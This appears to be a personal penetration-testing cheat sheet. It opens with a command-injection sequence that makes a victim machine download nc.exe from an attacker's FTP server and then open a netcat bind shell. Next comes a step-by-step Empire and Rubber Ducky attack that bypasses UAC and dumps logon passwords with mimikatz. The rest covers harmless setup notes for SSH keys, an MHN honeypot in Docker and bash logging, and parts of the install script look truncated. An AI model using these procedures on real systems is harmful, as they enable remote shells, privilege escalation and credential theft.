Create txt file remotely to get nc on victim host

  1. # str$(exec(“command.exe /c echo user [username] > ftp.txt”))
  2. # str$(exec(“command.exe /c echo pass [password] >> ftp.txt”))
  3. # str$(exec(“command.exe /c echo binary >> ftp.txt”))
  4. # str$(exec(“command.exe /c echo get nc.exe >> ftp.txt”))
  5. # str$(exec(“command.exe /c echo disconnect >> ftp.txt”))
  6. # str$(exec(“command.exe /c echo quit >> ftp.txt”))
  7. # str$(exec(“command.exe /c ftp -i -n -s:ftp.txt [IP OF ATTACKER PC”))
  8. # str$(exec(“nc -l -p 9999 -e command.exe”))

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4c. (Empire: agents) > interact FSDFSGAJ34FGH4
4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4f. (Empire: privesc/bypassuac ) > set Listener Listener01
4g. (Empire: privesc/bypassuac ) > run 
4h. (Empire: privesc/bypassuac ) > back * 2
4i. (Empire: agents) > list
4j. (Empire: agents) > interact DSGHFDFSGHJ243J
4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
4l. (Empire: credentials/mimikatz/logonpasswords ) > run

If succesful, logon passwords are now revealed in 
cleartext :)

SSH Authentication

  • Generate key pair

    • Linux: # ssh-keygen -t rsa
    • Putty: puttygen.exe
  • Load the private key in the PuTTY profile

  • Copy the public key to ~/.ssh/authorized_keys

  • Change permissions on folders

    • chmod 700 ~/.ssh
    • chmod 600 ~/.ssh/authorized_keys
  • Change owner on folder

    • Chown $USER:$USER ~/.ssh -R
  • Verify that folders aren’t group/world writeable

    • chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys
  • Edit sshd_config

    • # nano /etc/ssd_config
    • Make sure that a line says ‘AuthorizedKeysFile %h/.ssh/authorized_keys’
  • Restart SSH

    • # service ssh restart

Docker & MHN

Install docker

# apt-get install

Create & run Docker container for MHN

# docker run -p 10000:10000 -p 80:80 -p 3000:3000 -p 8089:8089 -p 8091:8091 --name mhnsrv --hostname=mhnsrv -t -i ubuntu:14.04 /bin/bash

Install & configure MHN server


set -x

apt-get update 
apt-get upgrade -y 
apt-get install git wget gcc supervisor -y 
cd /opt/ 
git clone 
cd mhn

cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF



mkdir -p /data/db /var/log/mhn /var/log/supervisor

supervisord &

#Starts the mongod service after installation
echo supervisorctl start mongod >> /opt/mhn/scripts/


supervisorctl restart all 

MHN Configuration

Do you wish to run in Debug mode?: y/n n
Superuser email:
Superuser password:
Superuser password: (again):
Server base url [“”]:
Honeymap url [“”]:
Mail server address [“localhost”]:
Mail server port [25]:
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [“”]:
Mail server password [“”]:
Mail default sender [“”]:
Path for log file [“/var/log/mhn/mhn.log”]:

Create & run a MHN sensor docker container

Container w/ all ports published

# docker run --publish-all=true --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04.02 /bin/bash

Container w/ specific ports published

# docker run -p 21:21 -p 2222:22 -p 23:23 -p 25:25 -p 8080:80 -p 110:110 -p 135:135 -p 139:139 -p 443:443 -p 445:445 -p 1433:1433 -p 3306:3306 -p 3389:3389 -p 5060:5060 -p 5061:5061 -p 5900:5900 -p 8081:8081 --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04 /bin/bash

Install additional apps

# apt install wget python


# docker ps : show docker processes

# docker logs [container_id]: show docker logs

# docker inspect [container_id]: show docker details

# docker stats [container_id]: show docker stats

# docker port [container_id]: show docker port

# docker attach mhn : interact with mhn docker container

CTRL-p CTRL-q : detach from container & leave it running

# docker start [container_id] : start a container

# docker exec [container_id] supervisord & : start the mhn server container + supervisor app.

More info

Docker User guides

Security Links

Average Security Guys

Secure Planet






Linux tips :: Various

Custom prompt

$ export PS1=”[\d \t \u@\h:\w]$”

2015-10-28 09_35_45-caab@wrksedfsh_ ~

Logging #1

Use Putty to log commands. Can be handy for documentation

  • Change Settings… –> Session –> Logging
    • Session logging –> Printable output

PuTTY Reconfiguration

Logging #2

Turn on continuous logging

export PROMPT_COMMAND='if [ "$(id -u)" -ne 0 ]; then echo "$(date "+%Y-%m-%d.%H:%M:%S") $(pwd) $(history 1)" >> ~/.logs/bash-history-$(date "+%Y-%m-%d").log; fi'


Then, to find a specific command or text string is as easy as

# grep -h nmap ~/.logs/bash-history-2016-06*